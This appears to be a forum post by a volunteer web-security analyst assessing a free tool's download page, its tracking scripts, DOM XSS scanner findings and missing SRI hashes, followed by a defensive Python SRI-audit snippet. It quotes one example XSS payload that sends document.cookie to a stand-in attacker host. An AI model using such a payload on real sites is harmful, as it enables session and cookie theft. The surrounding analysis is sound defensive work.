Hi RejZoR,
When you see what is running at that site:
http://retire.insecurity.today/#!/scan/60fc1c974bfdf490c2c49eb8c19231fceeae8d410bc8adf5544c38ac780280e3
and you know what to block and intend to willingly download the potentially unwanted software,
because you are fully aware of any risks involved, then there is no risk downloading the tool.
Nothing to hold you back.
Script blockers block some of the third party code running on that website like: -http://dmp.theadex.com/d/105/21/s/adex.js
and -http://beacon-4.newrelic.com/1/26cb0a7878? and -http://js-agent.newrelic.com/nr-100.js
Well, a developer of free tools has to make an income of sorts somewhere, so tracking scripts galore on such a page,
resulting in that PUP alert.
Just see where this lands for instance:
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fjs-agent.newrelic.com%2Fnr-100.js
The code error next to the XSS sources and sinks:
detected] script
info: [decodingLevel=0] found JavaScript
error: line:3: SyntaxError: missing ; before statement:
error: line:3: ar NR_QUEUE=[];"undefined"!=typeof window.NREUMQ?NR_QUEUE=NREUMQ:"undefined"!=typeof window.EPISODES?NR_QUEUE=EPISODES.q:"undefined"!=typeof window.NREUM&&(NR_QUEUE=NREUM.q);var NREUM=NREUM||{};NREUM.q=NR_QUEUE,NREUM.targetOrigin=document.location.protoco
error: line:3: ^
New Relic Google Episodes code that comes shared on the webs. Exceptions should be mitigated by re-copying for errors.
So whenever you use free tools today you pay with some of your privacy and meta-data; it always comes at a price that you should be willing to pay, or you should block what should be blocked at such a page.
Non-persistent cross-site-scripting attacks are possible here, depending on where code has access,
and could be performed via an attack like for instance
<SCRIPT>
document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
.
Just to give an example for document.location.protoco -> document.location.href)+"&p="+NREUM.sHash(document.referrer)
and indeed there is room for insecurity for scripts running on the site, see:
https://sritest.io/#report/0cddf512-ac4d-4005-b3da-5be611dfeb93
See:
http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.optimizely.com%2Fjs%2F507870057.js SRI hash missing
and Results from scanning URL:
http://cdn.optimizely.com/js/507870057.js
Number of sources found: 103
Number of sinks found: 42
Could be a good idea to profoundly security test all the code on that website,
but i.m.h.o. there are no immediate malware threats, neither from the site nor from that tool,
better security could be implemented though, just be aware of the complicated code chain error consequences.
All works through on the general website's security infrastructure.
Have a nice day,
polonus (volunteer website security analyst and website error-hunter)
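
The "SRI hash missing" finding in the post above can be checked locally. The following is an added example, not part of the original post: it lists third-party script tags that carry no Subresource Integrity attribute and shows how an integrity value is computed and verified. The page host `tools.example`, the sample HTML and the script body are constructed for the demonstration; only the script hosts come from the post.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

def sri_hash(body: bytes, alg: str = "sha384") -> str:
    # Value for an integrity="..." attribute: "<alg>-<base64 digest>"
    return f"{alg}-{base64.b64encode(hashlib.new(alg, body).digest()).decode('ascii')}"

def verify(integrity: str, body: bytes) -> bool:
    # Simplified: accept if any listed sha256/384/512 token matches the body
    for token in integrity.split():
        alg = token.split("-", 1)[0]
        if alg in ("sha256", "sha384", "sha512") and token == sri_hash(body, alg):
            return True
    return False

class ThirdPartyScriptAudit(HTMLParser):
    # Sorts <script src> tags loaded from another host by whether they carry SRI
    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host
        self.missing, self.pinned = [], []

    def handle_starttag(self, tag, attrs):
        attr = dict(attrs)
        src = attr.get("src")
        if tag != "script" or not src:
            return
        host = urlparse(src).hostname
        if host is None or host == self.page_host:
            return  # relative or same-host script, not third party
        (self.pinned if attr.get("integrity") else self.missing).append(src)

def audit(html: str, page_host: str) -> ThirdPartyScriptAudit:
    parser = ThirdPartyScriptAudit(page_host)
    parser.feed(html)
    return parser

# Constructed sample: script hosts are those named in the post; the page host
# "tools.example" and the script body are made up for the demonstration.
SAMPLE_BODY = b"var NREUM = NREUM || {};"
SAMPLE_HTML = f"""<script src="/js/site.js"></script>
<script src="http://js-agent.newrelic.com/nr-100.js"></script>
<script src="http://cdn.optimizely.com/js/507870057.js"></script>
<script src="http://dmp.theadex.com/d/105/21/s/adex.js"
        integrity="{sri_hash(SAMPLE_BODY)}" crossorigin="anonymous"></script>"""

if __name__ == "__main__":
    print("no SRI:", audit(SAMPLE_HTML, "tools.example").missing)
```

A browser refuses to run a script whose body no longer matches its integrity value, so a changed third-party file fails closed instead of executing in the page.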